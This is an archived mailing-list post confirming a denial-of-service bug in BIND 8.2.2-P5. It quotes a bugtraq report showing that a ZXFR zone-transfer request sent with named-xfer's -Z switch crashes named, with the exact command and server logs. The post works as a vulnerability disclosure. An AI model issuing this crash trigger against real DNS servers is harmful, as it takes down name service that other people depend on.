Bind-8.2.2-P5 DOS

Thu, 09 Nov 2000 08:59:08 -0600 

Debian 2.2 IS vulnerable to the following DOS reported by Fabio
Pietrosanti (naif) <[EMAIL PROTECTED]> in bugtraq:

<<
Hi,
playing with bind and ZXFR feature ( zone transfer compressed with a
possible insecure execlp("gzip", "gzip", NULL); ), i discovered a
Denial Of Service against Bind 8.2.2-P5 .

By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless
you define it with #define BIND_ZXFR so it will refuse any ZXFR
transfer, because it doesn't support it. But now what appens? Look
here...

################################
zone to transfer: zone.pippo.com
dns server:       dns.pippo.com 192.168.1.1
me:               naif.gatesux.com 10.10.10.10
I send a Zone Trasnfer request using "-Z" switch with means that i wish to use 
ZXFR.
dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, 
so everyone
could ask him for *.zone.pippo.com ...

<[EMAIL PROTECTED]> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z 
zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"

On the server's log:
Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from 
[10.10.10.10].2284 for "zone.pippo.com"
Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of 
"zone.pippo.com" (IN) to [10.10.10.10].2284

Then the server "*** CRASHED ***" .

I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and 
confirm this kind of dos)
and bind-9.0.0 has no support for ZXFR .

<[EMAIL PROTECTED]> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  
';' | wc -l
    234
<[EMAIL PROTECTED]> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} 
 ';' | wc -l
      0

A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they 
are dossable...


naif
[EMAIL PROTECTED]
>>

Here is my daemon.log:

Nov  9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for 
"domain.org"
Nov  9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" 
(IN) to [192.168.1.10].1642
Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set

And named was down...

Regards,

Jean-Marc Boursot

Reply via email to